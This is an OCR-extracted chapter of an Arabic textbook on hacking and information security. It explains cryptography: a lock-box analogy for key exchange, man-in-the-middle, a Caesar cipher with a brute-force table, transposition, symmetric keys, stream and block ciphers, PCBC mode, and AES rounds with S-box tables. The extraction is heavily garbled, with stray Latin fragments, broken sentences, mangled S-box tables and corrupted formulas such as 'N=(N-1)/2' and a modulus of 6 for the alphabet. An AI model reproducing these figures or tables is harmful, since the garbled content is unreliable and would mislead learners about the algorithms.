ماذا أفعل في حالة رغبتي للتواصل مع شخص يقع في مدينة أخرى وبشكل سري وموثوق؟. 
هل انتهيت؟ .. 


ربا سأقوم بالاتي: 

سأقوم بارسال رسول يحمل صندوق خشبي وبداخله "قفل"» هذا القفل سیکون مفتاحه معي آنا فقط cM‏ هذا القفل 
سأتركه مفتوحاً داخل | لصندوق.. وعند وصوله للشخص الرجوء سیقوم هو بأخذ "قفلي" dia‏ ثم یضع في هذا 
الصندوق "قفله هو" وأيضاً سیت رکه مفتوح ويحتفظ بمفتاح القفل لدیه. 
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والآن سيأتي d]‏ الصندوق وبه قفل صديقي المفتوح!ء حينها سأضع رسالتي الخطيرة بداخل الصندوق ثم أغلقه 
بالقفل الخاص بصديقي iles‏ مع الرسول thy‏ مطمین أنه في سرية» Cem‏ لن يتمكن من فتحه إلا صديقي لأنه 
الوحيد الذي يحمل مفتاح هذا القفل.. 
وبا مئل سيكتب لي صديقي الرد ویغلق الصندوق بقفلي أناء ويعيد إرسال الصندوق E‏ وبالطبع لن يتمكن أحدهم 
من فتحه سواي!. © ..أليس كذلك؟. 


لقد قمنا بضمان السرية لكن لم نضمن سلامة الصندوق!» led‏ يتعرض القفل للکسر أثناء الطريق!» أو يقوم أحدهم 
بتغيير القفل وإرساله إلى صديقي وبعد أن يضع صديقي قفله ا لخاص» سيقوم أيضاً باستبداله بقفل آخر AL‏ لي!» 
lies‏ يكون هذا الشخص “Man in the middle"‏ بيننا. ولكن لن يستمر هذا لأكثر من مرة» حيث لن نتمكن أنا 
وصديقي من فتح الأقفال بعد غلقها OY‏ مفاتيحنا كانت لأقفال أخرى قام باستبداها هذا الشخص الدخيل!. 


ماهذا ال Challenge‏ !! 
يبدو آننا بحاجة لبعض الآليات التي تضمن لنا اخصوصية. والمصداقية» والسلامة» والموثوقية آثناء تعاملنا مع 
الأشخاص أو الأجهزة الإلكترونية أو ال Data‏ بأنواعها!. 


سنتعرف dle‏ هذا الباب عل تقنیات تشفیر البیانات وآلیات عملها. 
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Cryptography 
.Ciphers هو عملية التواصل بين طرفين أو آکثر بشكل سري!» وذلك باستخدام ال‎ Cryptography ال‎ 


ما هذا ال €Cipher‏ 


نعم.. إنه التوليفة الذكية التي تطرأ على ال Plaintext‏ ليحرل إلى ال -Ciphertext‏ 


وما هو ال §CipherText‏ ..وماهي أمثلة ال Plaintext‏ التي سنهتم بتشفيرها ذا التعقيد..؟ 

هذا ال CipherText‏ هو عبارة عن ال “Scrambled Message"‏ إنة ال output‏ الناتج من تطبيق معادلات التشفير 
باستخدام ال Secret Key‏ على ال PlainText‏ أو ال ER Message‏ إرسالما. LI‏ هذا ال plaintext‏ فهو ال data‏ 
ال مهمة كرسالة بريد إلكتروني بها معلومات حساسة أو بيانات بطاقة «Credit Card‏ أو ملف Data Base‏ أو غير 


ذلك من البيانات الحساسة اراد حمايتها. 


ماهذا ال €Secret Key‏ 
إنه ال Randomizer‏ الذي یستخدم داخحل ال Algorithm‏ فمثلا لو فرضنا أن ال Algorithm‏ عبارة عن مجموعة من 
العادلات الرياضيةء فتکون وظيفة ال Key‏ تحدید ترتیب استخدام هذه العادلات واختیار القِيّم GIE‏ فیها كي 
c‏ في النهاية output‏ تلف عن ال output‏ الذي c»‏ قبله پاستخدام نفس ال oY .. Algorithm‏ العادلات Han‏ 


فلو |S blab‏ هی على ال plaintext‏ لإنتاج ال Ciphertext‏ وقام أحدهم بالإمساك مذا ال cipher‏ مع معرفة نوع 
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ال Ae dl Algorithm‏ فسيتمكن بل بساطة من استرجاع ال Ll cH plaintext‏ وجود ال Key‏ يزيد الأمر 
صعوبة حيث لن يتمكن من تخمين الخطوات والتغيرات التي طرئت على ال plaintext‏ لإنتاج هذا ال ..Cipher‏ 


سنعود إلى هذا ال key‏ مرة أخرى بعد قليل. 


ولكن ما هو تعريف ال Algorithm‏ إذاً؟ 
Lel‏ عبارة عن مجموعة من ال Mathematical Rules‏ التي ستستخدم في عملية التشفير وفك التشفير. 
وتعتمد ال Algorithm‏ على ال Key‏ لتحقيق ال M c! > Al Security‏ أن 

(Algorithms should be public) للجميع‎ ds gles تكون‎ Algorithms ال‎ * 

" بینا ال Key‏ لابد أن يكون سري بين dati‏ والستقبل (Keys should remain private)‏ 
يُمكننا الوصول e]‏ مَنطِقية» وهي: 


“The algorithm will produce a different output depending on the secret key” 
..Key values are used by the algorithms to indicate which equations to use, in what order, and 
with what values!. 


هذا جيد.. كيف تعمل هذه ال Algorithm‏ أو كيف سيعمل ال Key‏ داخل تلك ال f Algorithm‏ 


إنه يقوم بإجراء مجموعة من ال Substitutions‏ و ال Transpositions‏ على ال plaintext‏ لتحقيق التشفير. 


ما هذا ال Substitutions‏ و ال fTranspositions‏ 
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z i 2 of : : 5‏ 
الأولى (Substitution)‏ فهي باختصار.. del‏ قيمة ثم استبدالها بقيمة آخری فمثلاً JS‏ حرف في الرسالة سیتم 
استبداله بحرف جدید. 
a$‏ 


وأما الثانية فتعني أنني أَضّع القِيّم أو الأحرّف بعد إجراء ال Transpositions‏ عليها آمامي نم أقوم ببعترتها أو بتغیم 
آماکنها. 


ERP ede ge gaye dl 
Algorithm عن قوة ال‎ P (Characteristics) انا أحد المقاييس أو ال‎ 


“Confusion and Diffusion” تطلق علیها:‎ 


ded‏ ال Confusion‏ هذا OL‏ تكون العلاقة بين ال plaintext‏ و ال key‏ شديدة التعقید!» وهذا لنضمن أنه لو قام 
آحدهم بمعرفة ال ciphertext‏ وال plaintext‏ معا فیکون من الصعب عليه تخمين البادلات التي تمت على "الحرف" 
آو ال character‏ امو جود 3( ال plaintext‏ لينتج ذلك "حرف" القابل له في ال ciphertext‏ وهذا Gard‏ پتطبیق ال 
Substitution‏ على ste‏ مراحل. 
هذا تعریف آخر له: 

Confusion refers to methods used to hide relationships between the plaintext, 


the ciphertext, and the key. This means that the output bits must involve some complex 
transformation of the key and plaintext. 


آما ال Diffusion‏ يتحقق Ob‏ تكون العلاقة بين ال plaintext‏ ال ciphertext‏ معقدة بأكبر قدر مستطاع 
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(As complex as possible)‏ وهذا لأجل إحباط محاولات تمن ال Key‏ الستخدم في حالة التقاط أحدهم لل 
.ciphertext‏ ويتحقق هذا بتطبيق ال Transposition‏ على عدة مراحل Al‏ هذا يعنى أن ال Confusion‏ 28 بال 
«Substitution‏ وال .Transposition JL Jz Diffusion‏ 


إذا i‏ تستوعب ال Confusion‏ و ال Diffusion‏ بشكل واضح فستفهمهم عيذ عقب هذه الأمثلة: 
Substitution Example‏ 
سَنعرض مثال من کتاب السيد "ويليام ستالینح" لل Caesar Cipher‏ لنوضح به كيف تتم عملية ال Substitution‏ 


.كما يبدو من إسمه "Caesar Cipher"‏ أنه كان يستخدم في عهد "یولیوس p28‏ " 


مايل مثال «plaintext J‏ وال buh ciphertext‏ طا: 


plain: meet me after the toga party 
cipher: PHHW PH DIWHU WKH WRJD SDUWB 


يبدو سهلاً علينا تخمین ال Secret Key‏ ليس كذلك؟ 
هل أدركت فائدة ال Confusion & Diffusion‏ الآن؟ 
dli‏ يبدو أن ال Key‏ هو ”3 + “character in plain‏ لإنتاج ال «cipher‏ وبالعكس لفك الشفرة عند وصول 


."character in cipher — 3" الرسالة‎ 


لنفرض أننا أمسكنا cipher JL‏ هذا أثناء رحلته السعيدة إلى الشخص الآخر.. كيف یمکننا تخمین ال Key‏ المستخدم؟ 
سنقوم بترقيم الأحرف جميعها |S‏ هو موضح بالشكلء Jed‏ علينا إجراء المقارنة وتخمين ال Substitutions‏ الحادثة. 
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والآن هذا ال Key‏ ما أن يكون GAN)‏ + 1). أو GAN)‏ + 2( أو GAN‏ + 3)» إلى أن fred‏ إلى (الحرف + 25). 
)3( فنحن أمام of potentials Keys"‏ 25^« آي Gl‏ لدینا 25 احتال لنجربهم على هذا ال sali, cipher‏ المخرجات» 
إلى أن نُصادف عبارة مفهومة!ء حينها نكون قد وقعنا على ال Key‏ السليم. 

وبا Ul‏ هنا هنا لدينا ال ccipher‏ فسنقوم ke‏ ا معادلة: (الحرف - 0(« (الحرف - 2( ...(الحرف - Q5‏ وهكذا. 


مها با لاا 
Plaintext = Decryption(key, Cipher) = (Cipher - key) mod 6‏ 


يبدو أن ال Algorithm‏ آشبه - Arguments ist function‏ هی ال Key‏ وال UJ c3 Cipher‏ ال .Plaintext‏ هيا 


جرت تطبيق هذه المعادلة ومشاهدة edi‏ جات: 


PHHW PH DIWHU WKH WRJD SDUWB 
KEY 


oggv og chvgt vjg vqic rctva 
nffu nf bgufs uif uphb qbsuz 
meet me after the toga party 
ldds ld zesdq sgd snfz ozqsx 
kccr kc ydrcp rfc rmey nyprw 
jbbq jb xcqbo qeb qidx mxoqv 
iaap ia wbpan pda pkcw lwnpu 


YUAN OF WBN ذم‎ 
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هذا الذي طبقناه “Brute-Force Attack” igs‏ وهو يعنى الآتی: 


Trying every possible key until an intelligible translation of the ciphertext into plaintext is 
obtained. 


لقد فهمنا ال Substitution‏ الآن.. 


هيا لننتقل إلى ال .Transposition‏ 


Transposition Example 
إرساله.‎ ER Plaintext على ال‎ Transposition لإجراء عملية ال‎ "rail fence" سنستخدم تكنيك سيط هو ال‎ 


نأخذ مثال برسالة عبارة عن: THIS IS REALY GREAT BOOK‏ 
لتحقيق Security‏ أعلى سنقوم بكتابتها على هيئة ."Block"‏ 
سَتكتب الرسالة في صّفوف على هيئة block‏ ولكي 0555 ال ciphertext‏ سنقوم بكتابتها مر أخرى ولكن بالطول! 


cells Kev OEC‏ كرد E‏ نه ار لذ cd boe‏ كنا 
NEN e‏ والدي سر ML b Aer c‏ الذي ينمه او 


Key: 3 4 1 2 5 
Plain: T H S 
SREAL 
YGREA 
TBOOK 


والآن سنقوم باستخدام ال Key‏ لتكوين ال ecipher‏ بحيث نبداً بال Colum‏ رقم واحد وهو الثالث في الترتيب» ثم 


ال Colum‏ رقم 2 وهو الرابع في الترتيب.. وهكذا. فيكون ال Cipher‏ في النهاية هذا الشكل: 
IEROSAEOTSYTHRGBILAK‏ 
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Symmetric Cryptography 


في البداية سنقوم بتوضيح مفهوم ال “Cryptosystem”‏ 
pes 4l‏ عن مجموعة العادلات à i$ fall‏ تقديم هذه ال Security Service‏ وهي عملية التشفير وفك التشفير!. 


يتكون ال Cryptosystem‏ هذا من ثلاثة ‘Algorithms‏ 
تُستخدّم الأو لى 3( ال .Key generation‏ 
والثانية من أجل إجراء ال Encryption‏ 


والثالثة لأجل ال .Decryption‏ 
نستطيع التعبير عن هذه المراحل ede‏ الرموز AX, K, E, Y, D)‏ 
حیث يرمز ال X‏ إلى ال «plaintext‏ وال K‏ إلى ال «Key‏ وال E‏ إلى ال «Encryption‏ وال Y‏ إلى ال «Ciphertext‏ 


و أخير í‏ ال D‏ إلى ال .Decryption‏ 


الشكل بالصفحة التالية يوضح لك وظيفتهم في عملية التشفير وفك التشفير: 
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Understanding Hacking and Information Security 


Secret key shared by 
sender and a 


q^ 
-[ و‎ 2 
uu Encryption algorithm 
۳ (e.g., AES) 


القرصنة الإلكترونية وأمن المعلومارند 


Secret key shared by 
sender and recipient 


و 
X = D(K, Y)‏ 


Decryption algorithm pm em 
(reverse of encryption P 
algorithm) — 


ونقوم بتعريف ال į “Symmetric ail‏ ال dini i Cryptosystems‏ تفس ال Key‏ في عملية التشفير 


ر 


"Shared Secret Key" go‏ فيا بينهم. us,‏ زاد ال us Key Space‏ ازدادت قوتة وازدادت صعوبة کسره. 


Sender 


Encryption 


Receiver 


Decryption 


Algorithm 


Secret 
Key 


Algorithm 


Secret 
Key 


ولكن كيف سيتم توزيع هذا ال Secret Key‏ بين الأطراف F il‏ بحيث نضمن وصوله بشکل آمن وسري إلى كل 
¢ 

ur 

توجد هنا عدة slay‏ لإجراء هذا الأمرء أبسطها أن coa‏ هذا offline J5U3I‏ فيها بينهم!.. نُطلق على هذه العملية بال 
«"Key Distribution Management"‏ سنتكلم عنها في هاية هذا الباب.. 

يتميز هذا النوع من التشفير بالسرعة العالية إذا ما قورن بال Asymmetric Encryption‏ لكن من عيوبه أنه لا يقدم 


.Nonrepudiation خدمة ال‎ UJ 


ما هذا ال ¢..Nonrepudiation‏ 

La]‏ خاصية E‏ للمُستقبل أن هذه الرسالة التي وصلت إليه» قادمة من الشخص الذي قام بإرسلها بالفعل» ول يتم 
ٍرساها عن طریق شخص آخر مُنتحلاً شخصية Lal alas 1, pa pl‏ بعد قلیل.. 

والان (o‏ أن هذا ال Key‏ وحيد للتشفیر والفك. e LŽ‏ هذا ال key‏ بيد أَحَدِهِم فَيتمكن fel gl Ga‏ معي وکانة 
الشخص ley eun lt‏ 3( حالة ال Asymmetric Encryption‏ نُستخدم key‏ من أجل التشفير و آخر من أجل فك 
التشفير. فلو 655 أحد ال Keys‏ قي أيدي أحدهم لن يتمكن من التلاعب معنا ©. 

Lal‏ من عيوبه أنه غير مدي عند محاولة تطبيقه على الأعداد الكبيرة من المُشتركين في الإتصال» حيث أن لكل عملية 
اتصال بین اثنين ستحتاج Key‏ خاص ہم.. 

Seed‏ لنفرض أن أربعة أشخاص يريدون الدخول 3( group‏ لیتواصلوا فيا بینهم. ال 1 سیحتاج key‏ لیتصل 
بال 05672 و key‏ مختلف ليتواصل مع ال cuser3‏ وآخر ليتواصل مع ال .user4‏ ثم user2‏ سيحتاج key‏ ختلف 


عنهم ليتواصل مع ال cuser3‏ وآخر ليتواصل مع ال 5614ا. 
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وتنتهي iM‏ بتوظيف keys‏ 6 لمؤلاء Number of Participants Number of Keys)‏ 
ius 1‏ 5 تلخيص هذا بمعادلة تقوم 2 3 
بحساب ال keys‏ اللازمة ely‏ على عدد ال 
6 4 
5 المشتركين في المصلحة. 
10 5 
N=(N-1)/2‏ 45 10 
4,950 100 
وبتطبيق هذه المعادلة Su,‏ على 
499,500 1,000 
Web Application‏ يقوم بالاتصال به 


الآلاف من ال users‏ ستفاجاً بالكم BUI‏ من ال keys‏ المطلوبة لذلك!. ما يجعله غير مُلائم هذه العملية. 
الشكل بالأعلى يُوضح تطبيق العادلة على عدد GS pill‏ وحساب كمية ال Keys‏ المطلوبة لإجراء الاتصال. 


والآن سنتكلم عن أنو e‏ ال Ciphers‏ ال في ال .Symmetric Cryptography‏ 


Stream Cipher 


تعتمد فكرة هذا النوع من ال 75 على وجود "Key stream Generator”‏ يقوم بإنتاج Stream‏ من ال Bits‏ أو 
ال Bytes‏ العشوائية أو کا «Pseudo-Random Bits Peer:‏ يبدو مم من اسمها “Random”‏ أنه يشترط عدم 


وجود علاقة رياضية بين ال Bit‏ وال Bit‏ الذي يليه في ال Stream‏ 
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غالبا يتم انتاجها على هذا النحو: "One bit or one byte at a time"‏ بمعنی أنه كل plaintext digit‏ يقابلة 
.random bit‏ 

Key هنا!. هذا ال‎ Key أي أنها ستكون ال‎ «Key Stream بال‎ random bits على هذه السلسله من ال‎ alli 
سيمتلكة كلا الطرفين المشتركين في الإتصال.‎ 

ثم نقوم بعمل XOR‏ بين هذه ال Bits‏ وال Plaintext digits‏ لیم بهذا إنتاج ال .Ciphertext‏ وعند وصوله للجهة 
الأخرى Lal ex‏ استخدام نفس ال Key‏ لِعَمّل ال Decryption‏ بنفس الطريقة لاستعادة ال bb plaintext‏ شكل 


يوضح ال process‏ الحاصلة: 


ith binary digit of plaintext 
k; = ith binary digit of key 


S 
Il 


Key stream 


generator 


Key stream 
generator 


Cryptographic 
bit stream ( k; ) 


c; = ith binary digit of ciphertext 
Cryptographic 


bit stréam CED هم‎ = exclusive-or (XOR) operation 
1 


Plaintext 
(Pi) 


Ciphertext 
( Ci ) 


Plaintext 
( Pi ) 


وهذا شكل آخر يوضح نفس العملية: 
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Kev Bit-stream Kev Bit-stream 
(K) generation (K) generation 


algorithm algorithm 


Plaintext 


Plaintext Ci 
phertext 
cp (pj) 


(pi) (c;) 


ENCRYPTION DECRYPTION 


لعلك تتسائل.. لماذا نقوم باستخدام هذا ال 0×..؟ 
السبب cg VI‏ لكى يحدث التغير في شكل المدخلات «(plaintext JI)‏ وهذا pol‏ ستحصل عليه عندما gt‏ مهذه ال 


5 وندها مع ال plaintext‏ لینتج ال «ciphertext‏ هذه ال “Linear Function” wa XOR‏ 


It detects the ODD and the EVEN counts. 
The output will be 1 (when input bits are not matching) 
And the output will be 0 (when input bits are matching). 


.Reversible Operation Yb تتميز‎ lÎ (GUI والسبب‎ 


وماذا سنستفيد من ¢..“Reversible Operation" lig‏ 
سنأخذ مثال لنفهم منه فائدة عملية ال XOR‏ هذه. 


لنفرض أن ال plaintext digit‏ هو ال X‏ وال Random Bit‏ هو ال لاوال (X XOR Y)‏ هو ال Ciphertext‏ 
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هذا ال ciphertext‏ عندما يصل للجهة الأخرى سيتم عمل XOR‏ له مع ال Y‏ وهو ال Bit Stream‏ لینتج نفس ال X‏ 


مرة أخرى |S‏ يظهر. 


Block Cipher 
سيتم تحويله إلى ال‎ Block هذا ال‎ Block ك‎ plaintext أو ال‎ message يتعامل مع ال‎ Ciphers هذا النوع من ال‎ 


.Length بنفس ال‎ Gad Block iz» على‎ ciphertext 


b bits 


Encryption Decryption 
algorithm algorithm 


Ciphertext Plaintext 
A 


b bits b bits 


موضح بالشكل ال Length of Block‏ وهو المشار إليه بال “b bits"‏ لاحظ أنه ثابت لل plaintext‏ وال -ciphertext‏ 
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هل Sis‏ ال Transposition Cipher‏ الذي شر حناه من قبل؟ 
A;‏ هذا ال Transposition Cipher‏ آحد أشكال ال .Block Ciphers‏ 
الشكل السابق يوضح عملية التشفير ل Single Block‏ فقط!ء ولكن في الواقع لا يكون الأمر كذلك» بل يتم تقطيع 


ال plaintext‏ إلى أكثر من «Block‏ کل Block‏ منهم gs‏ حجمه bits‏ 64 أو bits‏ 128. 


In the next Fig: the input to the encryption algorithm is the XOR of the current plaintext block 
and the preceding ciphertext block 


Plaintext Plaintext Plaintext 


CIITITIITIITIITIT] — LIIIIIIIIIIIT] 2 LIIILILITITIT] 


Initialization Vector (IV) 
ANN — p 6 
block cipher block cipher block cipher 
Key Key Key 


LITITITITITIT] LLTITITITITIT] 5 ۵ ۱٩ ۱6 6۱۷ ۷ 
Ciphertext Ciphertext Ciphertext 


Propagating Cipher Block Chaining (PCBC) mode encryption 


لاحظ دُخول شیء غریب في عملية ال XOR‏ لول plaintext‏ وهو ال (IV)‏ 


فا هذا ال *.."Initialization Vector"‏ 

«Plaintext ال‎ c لما‎ XOR JR نقوم‎ Plaintext JL الخاص‎ Length لها نفس ال‎ Random String عبارة عن‎ 4l 
باستخدام نفس‎ “Block of Plaintext” محتلف في کل مره یتم تشفير نفس هذا ال‎ Ciphertext ووظيفتها هي إنتاج‎ 
وهذا لعل عملية تخمين الرسالة أصعب وأكثر تعقيداً.‎ Key ال‎ 
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أعتقد الآن أنه أصبحت لدينا بعض المفاهيم الجيدة التي سنعتمد عليها في المرحلة القادمة.. 
ete‏ ان S bs dl‏ ناه ف أول هذه الفة Cs Ses‏ تتحدث 4- bees Symmetric Encr tion JI‏ تى رف 
سنعود مرة آخری | كرناه في او ي عن Sy yp‏ وقمنا بتعرر 


مفهوم ال .Cryptosystems‏ 


سَننتقل لتحلیل نظام متکامل (Symmetric Cryptosystem)‏ یعتمد مدا ال Block Ciphers‏ في تشفیر OLLI‏ 
لعل آشهر هذه ال Symmetric Cryptosystem‏ هو ال AES‏ وال .3DES‏ 


سوف نذهب في جولة dak‏ داخل ال AES‏ 


AES (Advanced Encryption Standard) 


The Advanced Encryption Standard (AES) was published by the National Institute 

of Standards and Technology (NIST) in 2001. 

AES is a symmetric block cipher that is intended to replace DES as the approved standard for a 
wide range of applications. 

The algorithm is referred to as AES-128, AES-192, or AES-256, depending on the key length. 


يكون ال input‏ هذه ال Algorithm‏ بلوك يتكون من 16 BE‏ كل خانة byte E‏ 1« أي ol‏ حَجم ال block‏ 


سَيكون ۰128-016 هذا يعني انه سيفوم بتفسیم ال plaintext‏ ووضعة في e | ple d < Blocks‏ لية العة f å‏ 
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Understanding Hacking and Information Security المعلوماره‎ aly القرصنة الإلكنرونية‎ 


State Cipher key 


ستستقبل ال Algorithm‏ مدخلات «(inputs)‏ هذه الدخلات هي blocks‏ 2 هم ال plaintext‏ وتُطلق عليه State‏ 
وال input‏ الثانية هي مصفوفة ال cipher key‏ كما بالشکل بالأعلى. 
سیدخل كل منهم لسلسلة من النطوات: 
- ال State‏ ستذهب إلى ال Encryption Process‏ 
- وال Key‏ سیذهب إلى ال Key Schedule‏ لیتم col‏ ال Cipher Keys‏ اأ في کل .Round‏ 
لنعود إلى ال State‏ من جدید.. كر ال State‏ بعدة خطوات لیتم في النهاية تکوین ال 1006116 هذه 
الخطوات موضحة في الصفحة التالية» وهي على هذا النحو: 
- الخطوة الأو ی وهي ال Initial Transformation‏ 
- الخطوة الثانية وهي دخول هذا ال Block‏ في rounds”‏ 9“ متتالية. كل Round‏ من هذه التسعة» سيتعرض 
فيه ال State‏ هذا لأربع عمليات رياضية» سنتكلم عنهم بعد قليل. 
- ثم الخطوة الثالثة وهي ال Round‏ النهائية لينتج بعدها ال -Ciphertext‏ 
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Understanding Hacking and Information Security 


القرصنة الإلكترونية ممن ya elzall‏ 


Plaintext—16 bytes (128 bits) Key—M bytes 


REDEUNT QMEEEE لحم‎ ESSE 


Input state 
(16 bytes) Round 0 key 
(16 bytes) 
ul PEERS | 
State after 
initial 
transformation 
(16 bytes) 
Round 1 Round 1 key 7 
(4 transformations) (16 bytes) $ 
5 
2 
E 
g 
Round 1 2 
output state 
(16 bytes) 


e‏ © هس 


Bound N —1 Round N - 1 key 


(4 transformations) (16 bytes) 
Round N- 1 
output state 
(16 bytes) 
Round N key 
Round N (16 bytes) 
(3 transformations) 
Final state 
(16 bytes) 
BODEDOEBEIEBDEET T: 
Cipehertext—16 bytes (128 bits) 
Cryptography 
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نلاحظ أن هذه ال Rounds‏ جميعها عددها )10( غير ال initial transformation‏ وهذا WY‏ استخدمنا ال AES-‏ 


128. فلو قمنا باستخدام ال AES-192‏ سيتم في المقابل تنفيذ Rounds‏ 12 


على الحانب M‏ یدخل ال Cipher Key‏ في سلسلة من wolel VI‏ تطلق علیها Key Expansion"‏ كي يتم إنتاج 
keys)‏ 11(« الأول پستخدم في ال e «Initial transformation‏ تسعة مفاتيح من أجل Rounds) Jl‏ 9(« ثم ال Key‏ 


الأخير من أجل ال .Final Round‏ 


والآن.. سَنتكلم عَن ot fl‏ المتعلقة JX‏ من ال State‏ وال Cipher key‏ بشيء من التفصيل. 


The State Matrix Processes 
الخاص‎ Key لکن لن نتحدث عن العمليات التي تتم لإنتاج ال‎ Encryption Process سنقوم بالتركيز هنا على ال‎ 


LEY سنكتفي هنا بتوضيح مواضع استخدامهم في عملية التشفير» وسنقوم بتفصيلهم‎ Round JS 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماه‎ 


Cipher key 
initial 


9 round 


9 


Round key 0 main 
rounds 
Round key 10 
final 


e round 
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يبدو واضحاً أن ال initial round‏ تستخدم ال AddRoundKey‏ فقط!. lex‏ تتعرض ال State‏ بعدها Rounds J‏ 9« 
يتم فيها تنفيذ أربع خطوات متتالية في كل Round‏ وني ال Round‏ الأخيرة لا يتم تطبيق ال .MixColumns‏ والآن.. 


هيا لنقترب أكثر من هذه ال .Rounds‏ 
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Understanding Hacking and Information Security eslagleall القرصنة الإلكترونية وأمن‎ 


Initial round 
بينه‎ XOR فنقوم بعمل‎ «Key Expansion الأول في سلسلة ال‎ Key بتطبيق خطوة وحيدة وهي استخدام ال‎ tå نقوم‎ 


وبين ال |S State Matrix‏ يظهر بالشكل: 


Cipher key 


تحدث عَمَلية ال XOR‏ بين أول عَمود من كل من ال State‏ وال Key‏ وهكذا مع بّقية الأعمدة لینتح في النهاية 4×4 
à ÎL State Matrix‏ الدخول إلى ال Round‏ الأولى. 
zx‏ آنفسنا OV‏ داخل أول Round‏ .. سن تبدأ عملية ال :SubBytes‏ 


à.‏ هذه ال State‏ القادِمّة من ال initial round‏ لنقوم بتطبيق ال SubBytes‏ عليها ىا سَترى الآن: 


s [45 |sp 6 
756 s [oe] po] > 
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B35 Gs‏ هذا التَحَوّل؟ 


..لقد تمت مبادلة كل byte‏ من ال State‏ ب byte‏ آخر حصلنا عليه من جدول يسمى بال .S-Box‏ 


ماهذا ال 860:2 -5..؟ 

إنه عبارة عن جدول كبير له محور X‏ وآخر (Y‏ تجده في الصفحة التالية. 

Seas‏ نأخذ byte Jaf‏ وهو "EA"‏ سندخل إلى المحور × بالقيمة E‏ وإلى المحور الرأسي بالقيمة ۸ فتكون نقطة 
التقابل هي 877( والتي تظهر في أول خانة في المصفوفة الیّمنی في الصفحة السابقة. وبا آننا سنقوم بهذا الإجراء في 
حالة التشفیی سنحتاج أن تَعکِسَه في حالة فك التشفير» وبالتالي سَتحتاج إلى ال Inverse S-Box‏ أيضاً.. الشكل التالي 


يوضح عملية الإستبدال هذه: 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماه‎ 


7 


لا 

[SX | كط | 35[ 52 | مه‎ [m | 29 [ps | oF | [ 
م‎ LED [2 [rc | B1 | SB | s& | ce | pe | : |^ | ac | se | cr] 
[AA [s | ته‎ [ao | s [5 | که‎ | 8| o [7r | O [3c | oF | An 


KH 
_63 | 
Ea 
[09 | 
| DO | 
E 
[ED | 
E1 | 
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Understanding Hacking and Information Security القرصنة الإلكترونية من المعلوماءتهم‎ 


aT STS 

T+ [2 [3] *[=|*|7|*]°[4][®[ [>| F 

52 [v [6a [ps | o | 36 [as | 38 [BF | wo [as [se | sı | [pz a. 
FF 


m| 4 | 32 | ae هه‎ [30 [EE [ac | 95 [oo | [ra | cs | ae 
æ [ar] 66 2s |oo | 24 n | 76 [ss [az 49 | هه | هه‎ pr 25| 
re | ع‎ [e | se |e | 98 [16 [ps as] sc [cc sp [ 6s | ns [o 

so [ro [Ep | ده‎ [pa SE | 15 [6 [57 | ته‎ sp |w [ea 
]هه »د‎ o sc [sc [s هه‎ [rr [ra [sr fos | ma [ms [s [| 


[cr [ce [o [we se | 5 
rac] 74| 22 | تع‎ [up | ss [ss [rz [ro | 7 | es [1c [7s [pr | E 
FI i [7 [m 29 |cs[w | oF | 87 | @ |o [aa 18 [BE 19 
56 [s [as | cs | D2 | 79 | 20 [9a [pe | co re | 7s [cp [s | + 
DD As | 3 | ss | or |cr[s [m [12 [1 s» | 27 | so [Ec SF 
sı | 7F [Ao | 19 | Bs | 44 [op] aD [Es [7a 9F | 95 | cv | 9c | EF 

Ao [Eo | 38 | 4D [AE 2A | FS [wo | ce pm BB scs | s | 99 | اه‎ 
m Fw [re كنا‎ 77 [oe se [er e | 14| 8 [ss [2 [c [9 


(b) Inverse S-box 


انتهينا من مرحلة ال Uum «SubByte‏ كانت p‏ عن تطبيق iad‏ ال "Confusion"‏ 


هل تتذکر اونا 


والآن سننتقل إلى الرحلة الثانية: 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأحن المعلوماته‎ 


ShiftRows 


2 ١ 
5 
| 
MV GaU د‎ 4 


50 


إزاحة أفقية للبقية إلى السار كا هو موضح بالأعلى» وبخصوص ال row‏ الثالث فيتم bytes Jë‏ 2 (الثالث والرابع 
محل الأول والثاني)ء e‏ ال row‏ الرابع يتم Jë‏ ال byte‏ الأخير حل ال byte‏ الأول وإزاحة الباقين نحو اليمين» 
لنحصل على المصفوفة النهائية بالأسفل!. 

* الصورة التي تقع أسفل الشكل ناحية اليمين توضح ال State‏ التي طبقنا عليها ال S-box‏ فوق» بعد تعرّضِها لل ShiftRow‏ 
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لاحظ of‏ عملية ال ShiftRows‏ هذه تُعتبر تطبیق بدا ال “Diffusion”‏ 


هيا لننتقل إلى مرحلة ال :MixColumns‏ 


MixColumns 
8 & ۰ 5 3 Pd " ۰ 
نود تذكبرك‎ Lal “MixColumns Matrix" آخری وهی ال‎ i gia State يتم في هذه الطريقة ضَرْ ب مَصفوفة ال‎ 


5 . AE MC 35 P ques ۰ cf 
“Diffusion” Jad بان هذه العمّلية تعتہر تطبيق‎ 


oa = 
poga 
gaga 
poga 


(b) Mix column transformation Source: Ref{7 
-MixColumns Matrix سيتم ضربه في صف من ال‎ State يوضح الشكل أن كل عمود من ال‎ 
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02 03 01 01 | | Soo بوک‎ 502 3 $00 $01 $02 S03 
01 02 03 1 S0 514 S2 م51 | ایک‎ Sia 512 $13 
01 01 02 03 $20 521 S22 3 f» 20 S21 ور مرک‎ 
03 01 01 02[| موف 531 م55‎ 533 $39 Bı $32 33 


هيا لنجرب الأمر على JEM‏ الخاص بنا: 


لقد Wher‏ على ال State‏ بعد ثلاث مَراحل متتابعة» كانت أوهم ال SubBytes‏ حيث استخدمنا جداول ال (S-box‏ 
ثم دخلنا إلى ال ShiftRows‏ كأحد تطبيقات ال Diffusion‏ ومن بعدها إلى ال .MixColumns‏ والان Gl‏ دور 


المرحلة الرابعة والأخيرة لهذا ال «Round‏ وهى: 


AddRoundKey 
“Round Key 1” الناتجة من هذه المراحل الثلاثة مع ال‎ State لل‎ XOR حيث نقوم بعمل‎ 


fRound Key 1 ماهذا ال‎ 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماره‎ 


|4 ال Key‏ الذي تم انتاجه من ال Cipher key‏ الرئيسي» وذلك من خلال عملية ال Key Expansion‏ ..سئتاقشها 
بعد قليل.. 

في النهاية يتم اصول على هذا ال Block‏ گناتج من ال 1 Round‏ لیم بعد ذلك دخوله مرة أخرى للمُرور بتفس 
الاربع خطوات داخل ال 2 cRound‏ وهكذا حتى الوصول إلى ال 9 .Round‏ 

RSE ES EE 
CANG 


[66 | DC | 29 | o 
1E | 84 | E7 6 


Source: Ref (7) 


